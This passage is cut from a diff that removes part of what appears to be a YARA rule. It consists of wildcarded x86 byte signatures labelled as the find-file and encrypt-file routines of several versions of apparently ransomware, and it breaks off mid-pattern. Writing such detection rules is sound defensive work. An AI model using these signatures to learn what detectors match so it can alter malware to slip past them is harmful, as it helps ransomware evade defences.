-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ??
-            ?? ?? ?? FF D1 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ??
-            89 45 ?? 83 7D ?? ?? 0F 84 ( A6 | A8 ) 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ??
-            83 7D ?? ?? 0F 84 ( 78 | 7A ) 01 00 00 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 8B 11 83 E2 ?? 0F 85 94 00 00 00 C7 45 ?? ?? ?? ??
-            ?? 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 78 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 65 C7
-            45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 83 C0 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 43 8B 55 ?? 8B 02 50 8B
-        }
-		$v30_2_find_file_2 = {
-            4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 75 1C 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? EB 67 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75
-            54 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8B 45 ?? 83 C0 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 32 8B 55 ?? 52 E8
-            ?? ?? ?? ?? 83 C4 ?? 85 C0 75 16 8B 45 ?? 50 8B 4D ?? 51 E8 3C FE FF FF 83 C4 ?? 03 45 ?? 89 45 ?? 8B 55 ?? 52 E8 ?? ??
-            ?? ?? 83 C4 ?? 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F 85 DA FE FF FF 8B 45 ?? 50 E8 ??
-            ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 83 7D ?? ?? 74 ( 2E | 30 ) 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 50 8B 45 ?? 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 74 ( 0E | 10 ) 6A ?? [0-2] 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 89 55 ?? 8B 45 ??
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3
-        }
-		$v30_3_find_file_1 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 7C 02 00 00 E8 ?? ?? ?? ?? 89 45
-            ?? 83 7D ?? ?? 0F 84 67 02 00 00 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 50 E8 ?? ?? ??
-            ?? 83 C4 ?? 8B 4D ?? 0F B7 54 41 ?? 83 FA ?? 74 16 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 68
-            ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ??
-            ?? 0F 84 E7 01 00 00 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 B9 01 00
-            00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 83 C1 ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 91 00 00 00 8D 55
-            ?? 52 8B 45 ?? 83 C0 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 7A 8B 4D ?? 8B 11 83 E2 ?? 75 70 C7 45 ?? ?? ?? ?? ?? 8D 45
-            ?? 50 8B 4D ?? 83 C1 ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 49 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 8B 45 ?? 8B
-        }
-		$v30_3_find_file_2 = {
-            08 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 1C 8B 45 ?? 83 C0 ?? 89 45 ?? 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ??
-            ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? E9 88 00 00 00 8B 55 ?? 8B 02 83 E0 ?? 74 7E 8B 4D ?? 83 79 ?? ??
-            74 75 8B 55 ?? 83 C2 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 62 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 8B 4D ?? 83 C1 ?? 51 8B
-            55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 40 8B 45 ?? 50 8B 4D ?? 8B 51 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 1D 8B 45
-            ?? 50 8B 4D ?? 51 E8 15 FE FF FF 83 C4 ?? 85 C0 74 09 8B 55 ?? 83 C2 ?? 89 55 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B
-            4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F 85 AC FE FF FF 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ??
-            ?? ?? ?? FF D2 8B 45 ?? 50 8B 4D ?? 8B 51 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 2E 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 3D ?? ?? ?? ?? 74 0E 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 89
-            45 ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 8B E5 5D C3
-        }
-		$v20_1_encrypt_file_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 99 05 00 00 8B 45 ??
-            83 38 ?? 74 1B 8B 4D ?? 83 79 ?? ?? 74 12 8B 55 ?? 83 7A ?? ?? 74 09 8B 45 ?? 83 78 ?? ?? 75 08 8B 45 ?? E9 6E 05 00 00
-            8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ??
-            ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 F4 04 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B
-            4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 8D 45 ?? 50
-            8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 E7 03 00 00 66 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 6A ?? 6A ??
-            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 AF 03 00 00
-            8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 97 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 6A 03 00 00 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 2C 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 D9 02 00 00
-        }
-		$v20_1_encrypt_file_2 = {
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 8B 48 ?? 51 8B 55 ??
-            8B 02 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 81 02 00 00 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B
-            4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 41 02 00 00 8B 55 ?? 8B 45 ?? 3B 42 ??
-            0F 85 32 02 00 00 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F
-            84 0B 02 00 00 8B 45 ?? 3B 45 ?? 0F 85 FF 01 00 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ??
-            ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 CE 01 00 00 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ??
-            ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 75 0C 8B 55 ?? 3B 55 ?? 0F 84 73 01 00 00 C7 45 ?? ??
-            ?? ?? ?? 8B 45 ?? 33 C9 8B 55 ?? 2B 55 ?? 8B 75 ?? 1B 75 ?? 89 85 ?? ?? ?? ?? 89 4D ?? 89 55 ?? 89 75 ?? 8B 45 ?? 3B 45
-            ?? 77 1A 72 0B 8B 8D ?? ?? ?? ?? 3B 4D ?? 73 0D 8B 55 ?? 33 C0 89 55 ?? 89 45 ?? EB 12 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55
-            ?? 89 4D ?? 89 55 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 33 D2 03 4D ?? 13 55 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ??
-            ?? ?? 3B 45 ?? 75 12 8B 8D ?? ?? ?? ?? 3B 4D ?? 75 07 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B
-        }
-		$v20_1_encrypt_file_3 = {
-            55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F 84 A2 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 96 00 00 00 C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ??
-            ?? ?? ?? 83 C4 ?? 85 C0 74 60 6A ?? 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF
-            D1 85 C0 74 31 8B 55 ?? 3B 55 ?? 75 29 8B 45 ?? 33 C9 03 45 ?? 13 4D ?? 89 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ??
-            52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 75 02 EB 0D 83 7D ?? ?? 74 02
-            EB 05 E9 79 FE FF FF 83 7D ?? ?? 74 17 8B 55 ?? 3B 55 ?? 75 0F 8B 45 ?? 3B 45 ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 4D ?? 51 E8 ?? ?? ??
-            ?? 8B 90 ?? ?? ?? ?? FF D2 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ??
-            ?? ?? ?? FF D0 83 7D ?? ?? 74 0C 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0
-            83 7D ?? ?? 75 22 6A ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 75 07 C7 45 ?? ?? ?? ?? ??
-            8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 74 60 6A ?? 6A ?? 6A ?? 6A ?? 6A ??
-            68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 74 37 8D 95 ?? ?? ?? ?? 52 8D 85
-            ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90
-            ?? ?? ?? ?? FF D2 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 8B 45 ?? 5E 8B E5 5D C3
-        }
-		$v30_1_encrypt_file_1 = {
-            55 8B EC 83 EC ?? C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 02 05 00 00 8B 45 ?? 83 38 ?? 74
-            09 8B 4D ?? 83 79 ?? ?? 75 08 8B 45 ?? E9 E9 04 00 00 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
-            FF D0 89 45 ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 6F 04 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? 85 C0 0F 85 90 03 00 00 6A ?? 6A ?? 6A ?? 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 83 F8 ?? 0F 84 70 03
-            00 00 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 50 03 00 00 8D 55 ?? 52 8B 45
-            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 38 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 4D ?? 51 E8 ?? ??
-            ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 83 7D ?? ?? 0F 84 04 03 00 00 6A ?? 6A ?? 8B 45 ?? 8B 48 ?? 51 8B 55 ?? 52 E8 ??
-            ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 CC 02 00 00 8B 4D ?? 3B 4D ?? 73 08 8B 55 ?? 89 55 ?? EB 06 8B 45 ?? 89
-            45 ?? 8B 4D ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 6A ?? 6A ?? 8B 45 ?? 8B 08 51 E8 ?? ?? ??
-            ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F 84 73 01 00 00 8B 45 ?? 8B 48 ?? 83 E9 ?? 89 4D ?? 8B 55 ?? D1 E2 89 55 ?? 8B 45 ??
-        }
-		$v30_1_encrypt_file_2 = {
-            50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 35 01 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ??
-            ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 2B 4D ?? 39 4D ?? 73 08 8B 55 ?? 89 55 ?? EB 09 8B 45 ?? 2B 45 ?? 89 45 ?? 8B 4D
-            ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ??
-            FF D0 85 C0 0F 84 94 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 88 00 00 00 8B 55 ?? 3B 55 ?? 73 07 C7 45 ?? ?? ?? ?? ?? 83 7D ??
-            ?? 74 73 8B 45 ?? 89 45 ?? 8B 4D ?? 51 8D 55 ?? 52 8B 45 ?? 50 6A ?? 8B 4D ?? 51 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80
-            ?? ?? ?? ?? FF D0 85 C0 74 44 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF
-            D2 85 C0 74 21 8B 45 ?? 3B 45 ?? 75 19 8B 4D ?? 03 4D ?? 89 4D ?? 8B 55 ?? 03 55 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 83 7D
-            ?? ?? 74 06 83 7D ?? ?? 74 02 EB 0C 8B 45 ?? 3B 45 ?? 0F 85 FB FE FF FF 8B 4D ?? 3B 4D ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B
-            55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 83 7D ?? ?? 0F 85 02 01 00 00 C7 45
-            ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 DB 00 00 00 6A ?? 8D
-            4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B 4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 AE 00
-        }
-		$v30_1_encrypt_file_3 = {
-            00 00 8B 55 ?? 8B 45 ?? 3B 42 ?? 0F 85 9F 00 00 00 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88
-            ?? ?? ?? ?? FF D1 85 C0 74 7E 83 7D ?? ?? 75 78 8B 55 ?? 3B 55 ?? 74 1B 8B 45 ?? 8B 4D ?? 03 48 ?? 89 4D ?? 8B 55 ?? 2B
-            55 ?? 89 55 ?? 8B 45 ?? 89 45 ?? 6A ?? 8D 4D ?? 51 6A ?? 8D 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1
-            85 C0 74 34 83 7D ?? ?? 75 2E 6A ?? 8D 55 ?? 52 6A ?? 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85
-            C0 74 0D 83 7D ?? ?? 75 07 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 EB 07 C7 45 ?? ?? ??
-            ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 7D ?? ?? 75 71 83 7D ?? ?? 75 28 83 7D ?? ?? 75 22 68 ?? ??
-            ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? EB 43 83 7D ?? ?? 74 36 83 7D ??
-            ?? 74 30 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0
-            74 07 C7 45 ?? ?? ?? ?? ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83
-            C4 ?? EB 07 C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 8B 45 ?? 8B E5 5D C3
-        }
-		$v30_2_encrypt_file_1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? 56 C7 45 ?? ?? ?? ?? ?? 83 7D ?? ?? 74 06 83 7D ?? ?? 75 08 8B 45 ?? E9 BF 05 00 00 8B 45 ??
-            83 38 ?? 74 1B 8B 4D ?? 83 79 ?? ?? 74 12 8B 55 ?? 83 7A ?? ?? 74 09 8B 45 ?? 83 78 ?? ?? 75 08 8B 45 ?? E9 94 05 00 00
-            8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 89 45 ?? 6A ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 C7
-            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ??
-            ?? ?? ?? FF D0 89 45 ?? 83 7D ?? ?? 0F 84 1A 05 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 8D 85 ?? ?? ?? ?? 50 8B
-            4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 74 07 C7 45 ?? ?? ?? ?? ?? 66 0F 57 C0 66 0F 13 45 ?? 8D 45 ?? 50
-            8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 0D 04 00 00 66 0F 57 C0 66 0F 13 85 ?? ?? ?? ?? 6A ?? 6A ??
-            8B 85 ?? ?? ?? ?? 50 8B 8D ?? ?? ?? ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 83 F8 ?? 0F 84 D5 03 00 00
-            8D 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 BD 03 00 00 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B
-            45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 89 45 ?? 83 7D ?? ?? 0F 84 90 03 00 00 C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 52 03 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ??
-            ?? ?? ?? ?? 8D 45 ?? 50 8D 4D ?? 51 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 FF 02 00 00
-        }
-		$v30_2_encrypt_file_2 = {
-            C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 8B 45 ?? 8B 48 ?? 51 8B 55 ??
-            8B 02 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 A7 02 00 00 C7 45 ?? ?? ?? ?? ?? 6A ?? 8D 4D ?? 51 8B 55 ?? 8B 42 ?? 50 8B
-            4D ?? 8B 51 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 0F 84 67 02 00 00 8B 55 ?? 8B 45 ?? 3B 42 ??
-            0F 85 58 02 00 00 6A ?? 8D 4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 85 C0 0F
-            84 31 02 00 00 8B 45 ?? 3B 45 ?? 0F 85 25 02 00 00 8B 4D ?? 51 E8 ?? ?? ?? ?? 8B 90 ?? ?? ?? ?? FF D2 C7 45 ?? ?? ?? ??
-            ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 83 7D ?? ?? 0F 84 F4 01 00 00 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ??
-            ?? ?? 66 0F 57 C0 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 4D ?? 3B 4D ?? 75 0C 8B 55 ?? 3B 55 ?? 0F
-            84 90 01 00 00 C7 45 ?? ?? ?? ?? ?? 8B 45 ?? 33 C9 8B 55 ?? 2B 55 ?? 8B 75 ?? 1B 75 ?? 89 85 ?? ?? ?? ?? 89 8D ?? ?? ??
-            ?? 89 95 ?? ?? ?? ?? 89 75 ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 77 1D 72 0E 8B 8D ?? ?? ?? ?? 3B 8D ?? ?? ?? ?? 73 0D 8B 55 ??
-            33 C0 89 55 ?? 89 45 ?? EB 12 8B 4D ?? 2B 4D ?? 8B 55 ?? 1B 55 ?? 89 4D ?? 89 55 ?? 8B 45 ?? 89 45 ?? 8B 4D ?? 33 D2 03
-            4D ?? 13 55 ?? 89 8D ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B 45 ?? 75 12 8B 8D ?? ?? ?? ?? 3B 4D ?? 75 07 C7
-            45 ?? ?? ?? ?? ?? 6A ?? 8D 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 8B 80 ?? ?? ?? ?? FF D0 85 C0 0F
-            84 B3 00 00 00 8B 4D ?? 3B 4D ?? 0F 85 A7 00 00 00 C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 55 ?? 52 8D 45 ?? 50 8B
-        }
-		$v30_2_encrypt_file_3 = {
-            4D ?? 51 8B 55 ?? 52 8B 45 ?? 50 8B 4D ?? 51 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 71 6A ?? 8D 45 ?? 50 8B 4D ??
-            51 8B 55 ?? 52 8B 45 ?? 50 E8 ?? ?? ?? ?? 8B 88 ?? ?? ?? ?? FF D1 85 C0 74 42 8B 55 ?? 3B 55 ?? 75 3A 8B 45 ?? 33 C9 03
-            45 ?? 13 4D ?? 89 45 ?? 89 4D ?? C7 45 ?? ?? ?? ?? ?? 8B 55 ?? 33 C0 03 55 ?? 13 45 ?? 89 55 ?? 89 45 ?? 8B 4D ?? 51 E8
